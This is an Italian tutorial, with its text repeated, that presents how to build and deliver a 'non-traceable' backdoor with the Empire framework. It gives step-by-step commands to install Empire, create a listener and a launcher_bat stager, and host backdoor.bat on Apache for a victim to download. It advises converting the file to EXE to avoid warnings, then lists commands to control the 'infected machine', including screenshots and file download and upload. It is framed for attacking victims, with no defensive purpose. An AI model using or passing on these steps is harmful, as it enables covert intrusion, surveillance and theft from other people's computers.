Ultima modifica:
Buongiorno a tutti, oggi vi propongo un programma che permette di creare backdoor non rintracciabili.
CI TENGO A PRECISARE CHE IL PROGRAMMA NON E' MIO E MI LIMITO A FARVELO CONOSCERE E A ESPORVI I COMANDI PRINCIPALI.
Fatta questa premessa possiamo iniziare.
Anzitutto scarichiamo il programma, Empire.
Come prima cosa installiamolo. Per farlo eseguite i seguenti comandi:
Iniziamo a creare la backdoor impostando come host il nostro computer quindi eseguite i seguenti comandi:
Attiviamo il servizio apache2 con il seguente comando:
ESEMPIO: 192.168.1.15/backdoor.bat
Il file verrà scaricato automaticamente.
Se si prova ad aprire però il PC ci avvisa che non è sicuro aprire i file in bat, se abbiamo già effettuato l'exploit della macchina non c'è problema, in caso contrario consiglio di trasformarlo in EXE, potete farlo qui.
Passiamo ora ai comandi principali una volta aperto il file .bat/.exe
Per interagire con la macchina infetta è necessario inserire un comando ed a seguire il nome della macchina vittima, perciò una volta che il file verrà eseguito sulla macchina vittima il risultato sarà il seguente:
"[*] Initial agent [nome della macchina] now active"
per rinominare il nome della macchina eseguiamo il comando:
Ecco ora una lista dei comandi basilari:
Spero di esservi stato utile con questa guida
CI TENGO A PRECISARE CHE IL PROGRAMMA NON E' MIO E MI LIMITO A FARVELO CONOSCERE E A ESPORVI I COMANDI PRINCIPALI.
Fatta questa premessa possiamo iniziare.
Anzitutto scarichiamo il programma, Empire.
Come prima cosa installiamolo. Per farlo eseguite i seguenti comandi:
- git clone https://github.com/EmpireProject/Empire.git
- cd Empire
- ./setup/install.sh
- premete Invio alla fine del processo (<- Ovviamente questo non è un comando, dovete solo premere Invio)
- python empire
Iniziamo a creare la backdoor impostando come host il nostro computer quindi eseguite i seguenti comandi:
- listeners
- set Host 127.0.0.1
- execute
- usestager launcher_bat
- set Listener test
- set OutFile /var/www/html/backdoor.bat
Attiviamo il servizio apache2 con il seguente comando:
- service apache2 start
ESEMPIO: 192.168.1.15/backdoor.bat
Il file verrà scaricato automaticamente.
Se si prova ad aprire però il PC ci avvisa che non è sicuro aprire i file in bat, se abbiamo già effettuato l'exploit della macchina non c'è problema, in caso contrario consiglio di trasformarlo in EXE, potete farlo qui.
Passiamo ora ai comandi principali una volta aperto il file .bat/.exe
Per interagire con la macchina infetta è necessario inserire un comando ed a seguire il nome della macchina vittima, perciò una volta che il file verrà eseguito sulla macchina vittima il risultato sarà il seguente:
"[*] Initial agent [nome della macchina] now active"
per rinominare il nome della macchina eseguiamo il comando:
- rename [Nome vecchio] [Nome nuovo]
- interact [nome della macchina infetta]
Ecco ora una lista dei comandi basilari:
- pwd: consente di vedere dove ci troviamo nel computer.
- In parole povere è il terminale: possiamo usare cd, dir e tutti i comandi utilizzabili nel cmd di windows.
- usemodule
- Ci permette di usare un modulo per fare qualcosa nella macchina vittima
- per esempio: il modulo evocabile dal comando "usemodule collection/screenshot"
- come lo stesso nome sta ad indicare permette di fare uno screenshot del PC della vittima,
- quest'ultimo verrà salvato nella cartella /Empire/downloads/[Nome della macchina infetta]/screenshot
- download
- Ci permette di scaricare files DALLA macchina infetta
- upload
- Ci permette di caricare files NELLA macchina infetta
Spero di esservi stato utile con questa guida